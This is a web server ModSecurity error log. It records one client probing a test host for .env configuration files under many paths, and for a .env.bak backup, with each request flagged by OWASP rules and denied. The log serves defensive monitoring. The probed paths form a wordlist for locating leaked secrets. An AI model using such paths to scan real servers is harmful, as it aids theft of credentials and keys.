[Wed Jan 07 03:50:26.399626 2026] [:error] [pid 1248393] [client 45.148.10.159:59156] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aV3J8heYWvWJmu8YY0xpRAAAAAQ"]
[Wed Jan 07 03:50:26.399830 2026] [:error] [pid 1248393] [client 45.148.10.159:59156] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aV3J8heYWvWJmu8YY0xpRAAAAAQ"]
[Wed Jan 07 03:50:26.399981 2026] [:error] [pid 1248393] [client 45.148.10.159:59156] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aV3J8heYWvWJmu8YY0xpRAAAAAQ"]
[Wed Jan 07 03:50:26.528159 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwtgAAAAI"]
[Wed Jan 07 03:50:26.528383 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwtgAAAAI"]
[Wed Jan 07 03:50:26.528558 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwtgAAAAI"]
[Wed Jan 07 03:50:26.561987 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwtwAAAAI"]
[Wed Jan 07 03:50:26.562185 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwtwAAAAI"]
[Wed Jan 07 03:50:26.562360 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwtwAAAAI"]
[Wed Jan 07 03:50:26.596030 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwuAAAAAI"]
[Wed Jan 07 03:50:26.596263 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwuAAAAAI"]
[Wed Jan 07 03:50:26.596420 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwuAAAAAI"]
[Wed Jan 07 03:50:26.629061 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwuQAAAAI"]
[Wed Jan 07 03:50:26.629257 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwuQAAAAI"]
[Wed Jan 07 03:50:26.629431 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwuQAAAAI"]
[Wed Jan 07 03:50:26.674161 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwugAAAAI"]
[Wed Jan 07 03:50:26.674362 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwugAAAAI"]
[Wed Jan 07 03:50:26.674513 2026] [:error] [pid 1248391] [client 45.148.10.159:59166] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aV3J8jNvD-ZISLd-2fIwugAAAAI"]
[Wed Jan 07 03:50:26.807209 2026] [:error] [pid 1249055] [client 45.148.10.159:59170] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aV3J8oCwIwNwLd1B0jiSmwAAAAY"]
[Wed Jan 07 03:50:26.807412 2026] [:error] [pid 1249055] [client 45.148.10.159:59170] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aV3J8oCwIwNwLd1B0jiSmwAAAAY"]
[Wed Jan 07 03:50:26.807570 2026] [:error] [pid 1249055] [client 45.148.10.159:59170] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aV3J8oCwIwNwLd1B0jiSmwAAAAY"]
[Wed Jan 07 03:50:26.847052 2026] [:error] [pid 1249055] [client 45.148.10.159:59170] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aV3J8oCwIwNwLd1B0jiSnAAAAAY"]
[Wed Jan 07 03:50:26.847230 2026] [:error] [pid 1249055] [client 45.148.10.159:59170] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aV3J8oCwIwNwLd1B0jiSnAAAAAY"]
[Wed Jan 07 03:50:26.847375 2026] [:error] [pid 1249055] [client 45.148.10.159:59170] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aV3J8oCwIwNwLd1B0jiSnAAAAAY"]
[Wed Jan 07 03:50:26.890391 2026] [:error] [pid 1249055] [client 45.148.10.159:59170] [client 45.148.10.159] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aV3J8oCwIwNwLd1B0jiSnQAAAAY"]
[Wed Jan 07 03:50:26.890495 2026] [:error] [pid 1249055] [client 45.148.10.159:59170] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aV3J8oCwIwNwLd1B0jiSnQAAAAY"]
[Wed Jan 07 03:50:26.890661 2026] [:error] [pid 1249055] [client 45.148.10.159:59170] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aV3J8oCwIwNwLd1B0jiSnQAAAAY"]
[Wed Jan 07 03:50:26.890811 2026] [:error] [pid 1249055] [client 45.148.10.159:59170] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aV3J8oCwIwNwLd1B0jiSnQAAAAY"]
[Wed Jan 07 03:50:27.171673 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMowAAAAE"]
[Wed Jan 07 03:50:27.171891 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMowAAAAE"]
[Wed Jan 07 03:50:27.172040 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMowAAAAE"]
[Wed Jan 07 03:50:27.219128 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMpAAAAAE"]
[Wed Jan 07 03:50:27.219315 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMpAAAAAE"]
[Wed Jan 07 03:50:27.219459 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMpAAAAAE"]
[Wed Jan 07 03:50:27.262149 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMpQAAAAE"]
[Wed Jan 07 03:50:27.262334 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMpQAAAAE"]
[Wed Jan 07 03:50:27.262513 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMpQAAAAE"]
[Wed Jan 07 03:50:27.313807 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMpgAAAAE"]
[Wed Jan 07 03:50:27.313988 2026] [:error] [pid 1248390] [client 45.148.10.159:59176] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aV3J88EIxEbNfU6y2MWMpgAAAAE"]
